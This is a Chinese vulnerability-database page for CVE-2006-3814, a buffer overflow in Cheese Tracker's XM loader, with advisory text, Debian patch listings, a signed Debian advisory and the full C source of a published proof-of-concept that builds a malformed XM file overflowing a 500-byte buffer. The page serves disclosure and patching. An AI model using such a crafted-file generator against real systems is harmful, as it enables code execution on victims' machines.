CVE-2006-3814
CVSS5.1
发布时间 :2006-07-25 09:22:00
修订时间 :2017-07-19 21:32:37
NMCOEPS    

[原文]Buffer overflow in the Loader_XM::load_instrument_internal function in loader_xm.cpp for Cheese Tracker 0.9.9 and earlier allows user-assisted attackers to execute arbitrary code via a crafted file with a large amount of extra data.


[CNNVD]Cheese Tracker 'loader_xm.cpp' XM Loader缓冲区溢出漏洞(CNNVD-200607-440)

        Cheese Tracker 0.9.9及之前版本的loader_xm.cpp中的Loader_XM::load_instrument_internal函数存在缓冲区溢出。用户协助式攻击者可以借助带有大量附加数据的特制文件,执行任意代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3814
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3814
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-440
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/cheesebof-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/cheesebof-adv.txt
http://securityreason.com/securityalert/1291
(UNKNOWN)  SREASON  1291
http://www.debian.org/security/2006/dsa-1166
(UNKNOWN)  DEBIAN  DSA-1166
http://www.gentoo.org/security/en/glsa/glsa-200610-13.xml
(UNKNOWN)  GENTOO  GLSA-200610-13
http://www.securityfocus.com/archive/1/archive/1/440962/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060723 Buffer-overflow in the XM loader of Cheese Tracker 0.9.9
http://www.securityfocus.com/bid/19115
(UNKNOWN)  BID  19115
https://exchange.xforce.ibmcloud.com/vulnerabilities/27957
(UNKNOWN)  XF  cheesetronic-loaderxm-bo(27957)

- 漏洞信息

Cheese Tracker 'loader_xm.cpp' XM Loader缓冲区溢出漏洞
中危 缓冲区溢出
2006-07-25 00:00:00 2006-08-07 00:00:00
远程  
        Cheese Tracker 0.9.9及之前版本的loader_xm.cpp中的Loader_XM::load_instrument_internal函数存在缓冲区溢出。用户协助式攻击者可以借助带有大量附加数据的特制文件,执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Cheese Tracker Cheese Tracker 0.9.9
        Debian cheesetracker_0.9.9-1sarge1_alpha.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_alpha.deb
        Debian cheesetracker_0.9.9-1sarge1_amd64.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_amd64.deb
        Debian cheesetracker_0.9.9-1sarge1_arm.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_arm.deb
        Debian cheesetracker_0.9.9-1sarge1_hppa.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_hppa.deb
        Debian cheesetracker_0.9.9-1sarge1_i386.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_i386.deb
        Debian cheesetracker_0.9.9-1sarge1_ia64.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_ia64.deb
        Debian cheesetracker_0.9.9-1sarge1_m68k.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_m68k.deb
        Debian cheesetracker_0.9.9-1sarge1_mips.deb
        Debian 3.1 (stable)
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_mips.deb
        Debian cheesetracker_0.9.9-1sarge1_mipsel.deb
        Debian 3.1 (stable)
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_mipsel.deb
        Debian cheesetracker_0.9.9-1sarge1_powerpc.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_powerpc.deb
        Debian cheesetracker_0.9.9-1sarge1_s390.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_s390.deb
        Debian cheesetracker_0.9.9-1sarge1_sparc.deb
        Debian GNU/Linux 3.1 alias sarge
        http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetra cker_0.9.9-1sarge1_sparc.deb
        

- 漏洞信息 (2065)

Cheese Tracker <= 0.9.9 Local Buffer Overflow Exploit PoC (EDBID:2065)
windows local
2006-07-23 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>



#define VER         "0.1"
#define CPOS        243                 // reader.get_file_pos()-p_cpos
#define JUNKSZ      (500 + CPOS)        // Uint8 junkbuster[500]
#define OVERFLOW    740                 // overflow
#define BOFSZNUM    (JUNKSZ + OVERFLOW)
#define BOFSZ       ((JUNKSZ + OVERFLOW) - CPOS)



#define myzero(x)   memset(x, 0, sizeof(x));
void put_bytes(FILE *fd, int chr, int size);
void std_err(void);



#pragma pack(1)

struct header {
    uint8_t     id_text[17];
    uint8_t     mod_name[20];
    uint8_t     boh;
    uint8_t     tracker[20];
    uint16_t    ver;
    uint32_t    head_size;
    uint16_t    song_len;
    uint16_t    restart_pos;
    uint16_t    channels;
    uint16_t    patterns;
    uint16_t    instr;
    uint16_t    flags;
    uint16_t    tempo;
    uint16_t    bpm;
    uint8_t     patt_table[256];
} header;

struct patterns {
    uint32_t    length;
    uint8_t     type;
    uint16_t    rows;
    uint16_t    packed_size;
} patterns;

struct instruments {
    uint32_t    size;
    uint8_t     name[22];
    uint8_t     type;
    uint16_t    samples;
    uint32_t    Sample_header_size;
} instruments;

struct envelope {
    uint8_t     Sample_number_for_all_notes[96];
    uint16_t    Points_for_volume_envelope[24];
    uint16_t    Points_for_panning_envelope[24];
    uint8_t     Number_of_volume_points;
    uint8_t     Number_of_panning_points;
    uint8_t     Volume_sustain_point;
    uint8_t     Volume_loop_start_point;
    uint8_t     Volume_loop_end_point;
    uint8_t     Panning_sustain_point;
    uint8_t     Panning_loop_start_point;
    uint8_t     Panning_loop_end_point;
    uint8_t     Volume_type;
    uint8_t     Panning_type;
    uint8_t     Vibrato_type;
    uint8_t     Vibrato_sweep;
    uint8_t     Vibrato_depth;
    uint8_t     Vibrato_rate;
    uint16_t    Volume_fadeout;
    uint16_t    Reserved;   // uint8_t    Reserved[11]; (do not use here)
} envelope;

struct sample {
    uint32_t    length;
    uint32_t    loop_start;
    uint32_t    loop_length;
    uint8_t     volume;
    uint8_t     finetune;
    uint8_t     type;
    uint8_t     panning;
    int8_t      relative_note;
    uint8_t     reserved;
    uint8_t     name[22];
} sample;

#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    int     i,
            j;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Cheese Tracker <= 0.9.9 possible code execution "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <output_file.XM>\n"
            "\n", argv[0]);
        exit(1);
    }

    fname = argv[1];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

        /* header */
    printf("- build header\n");

    strncpy(header.id_text,   "id_text",  sizeof(header.id_text));
    strncpy(header.mod_name,  "mod_name", sizeof(header.mod_name));
    header.boh                = 26;
    strncpy(header.tracker,   "tracker",  sizeof(header.tracker));
    header.ver                = 4 | (1 << 8);
    header.head_size          = 276;
    header.song_len           = 0;
    header.restart_pos        = 0;
    header.channels           = 0;
    header.patterns           = 0;
    header.instr              = 1;
    header.flags              = 1;
    header.tempo              = 6;
    header.bpm                = 130;
    myzero(header.patt_table);

    fwrite(&header, sizeof(header), 1, fd);

        /* patterns */

    for(i = 0; i < header.patterns; i++) {
        printf("- build pattern\n");

        patterns.length      = 9,
        patterns.type        = 0;
        patterns.rows        = 64,
        patterns.packed_size = 0;

        fwrite(&patterns, sizeof(patterns), 1, fd);

        put_bytes(fd, patterns.packed_size, 0xff);  // packed!
    }

        /* instruments */
    printf("- build instruments\n");

    for(i = 0; i < header.instr; i++) {
        instruments.size               = BOFSZNUM;
        strncpy(instruments.name,      "instrument_name", sizeof(instruments.name));
        instruments.type               = 0;
        instruments.samples            = 1;
        instruments.Sample_header_size = 40;

        fwrite(&instruments, sizeof(instruments), 1, fd);

        for(j = 0; j < instruments.samples; j++) {

                /* envelope */
            printf("- build envelope\n");

            myzero(envelope.Sample_number_for_all_notes);
            myzero(envelope.Points_for_volume_envelope);
            myzero(envelope.Points_for_panning_envelope);
            envelope.Number_of_volume_points  = 0;
            envelope.Number_of_panning_points = 0;
            envelope.Volume_sustain_point     = 0;
            envelope.Volume_loop_start_point  = 0;
            envelope.Volume_loop_end_point    = 0;
            envelope.Panning_sustain_point    = 0;
            envelope.Panning_loop_start_point = 0;
            envelope.Panning_loop_end_point   = 0;
            envelope.Volume_type              = 0;
            envelope.Panning_type             = 0;
            envelope.Vibrato_type             = 0;
            envelope.Vibrato_sweep            = 0;
            envelope.Vibrato_depth            = 0;
            envelope.Vibrato_rate             = 0;
            envelope.Volume_fadeout           = 128;
            envelope.Reserved                 = 0;

            fwrite(&envelope, sizeof(envelope), 1, fd);

            printf("- %d bytes will be copied in the junkbuster[500] buffer\n", BOFSZ);
            put_bytes(fd, BOFSZ, 'a');
        }
    }

    fclose(fd);
    printf("- finished\n");
    return(0);
}



void put_bytes(FILE *fd, int size, int chr) {
    while(size--) fputc(chr, fd);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2006-07-23]
		

- 漏洞信息 (F49732)

Debian Linux Security Advisory 1166-1 (PacketStormID:F49732)
2006-09-07 00:00:00
Debian  debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2006-3814
[点击下载]

Debian Security Advisory 1166-1 - Luigi Auriemma discovered a buffer overflow in the loading component of cheesetracker, a sound module tracking program, which could allow a maliciously constructed input file to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1166-1                    security@debian.org
http://www.debian.org/security/                                 Steve Kemp
September 3rd, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : cheesetracker 
Vulnerability  : buffer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2006-3814
BugTraq ID     : 20060723
Debian Bug     : 380364

Luigi Auriemma discovered a buffer overflow in the loading component
of cheesetracker, a sound module tracking program, which could allow a
maliciously constructed input file to execute arbitary code.

For the stable distribution (sarge) this problem has been fixed in
version 0.9.9-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.9.9-6.

We recommend that you upgrade your cheesetracker package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1.dsc
      Size/MD5 checksum:      659 94fe4cfb651e3fd373a79d8928b7c24c
    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1.diff.gz
      Size/MD5 checksum:    14286 c3e831161af73cb234e5ccee329e90ae
    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9.orig.tar.gz
      Size/MD5 checksum:   842246 d2cb55cd35eaaaef48454a5aad41a08d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_alpha.deb
      Size/MD5 checksum:  1138458 aa9cab8b149d4824c4f19ef8f89f2200

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_amd64.deb
      Size/MD5 checksum:   929228 67b42bf5ca9b7b7c230bb21a5ec3942d

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_arm.deb
      Size/MD5 checksum:  1159110 04e55102d781a572aa1e091a75c7c615

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_hppa.deb
      Size/MD5 checksum:  1248130 547aa7324369bb2572d28558a418bd6f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_i386.deb
      Size/MD5 checksum:   904204 286d04ae0c9893c894b67d2336e9aae9

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_ia64.deb
      Size/MD5 checksum:  1292230 d6e5e7d89f45509cccb1a51498629bdf

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_m68k.deb
      Size/MD5 checksum:   977470 6287cf1f532affc53921547dd9b9a6a4

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_powerpc.deb
      Size/MD5 checksum:   968684 839f5a35fe36eb2f12627d5b9e6bbd8b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_s390.deb
      Size/MD5 checksum:   871530 9b6f802a60f568a537d7f6e40f15e4da

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_sparc.deb
      Size/MD5 checksum:   975272 c0cc12c0095961806788d1871acbbf54

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFE+ssowM/Gs81MDZ0RAu/EAJ44jroCmofByWjRsIWvZvD64hofSgCglyET
egUPEuZnuJ9jAtrdAIikfhE=
=xuCl
-----END PGP SIGNATURE-----

    

- 漏洞信息

28466
Cheese Tracker loader_xm.cpp Loader_XM::load_instrument_internal Function Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-07-23 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cheese Tracker XM Loader Buffer Overflow Vulnerability
Boundary Condition Error 19115
Yes No
2006-07-23 12:00:00 2006-12-22 12:03:00
Luigi Auriemma discovered this issue.

- 受影响的程序版本

Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Cheese Tracker Cheese Tracker 0.9.9

- 漏洞讨论

Cheese Tracker is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input data before copying it to an insufficiently sized memory buffer.

An attacker may cause malicious code to execute by supplying a malicious XM file. This may facilitate unauthorized remote access with the privileges of the user running the vulnerable application.

- 漏洞利用

Exploit code is available.

- 解决方案

Please see the references for more information and vendor advisories.


Cheese Tracker Cheese Tracker 0.9.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站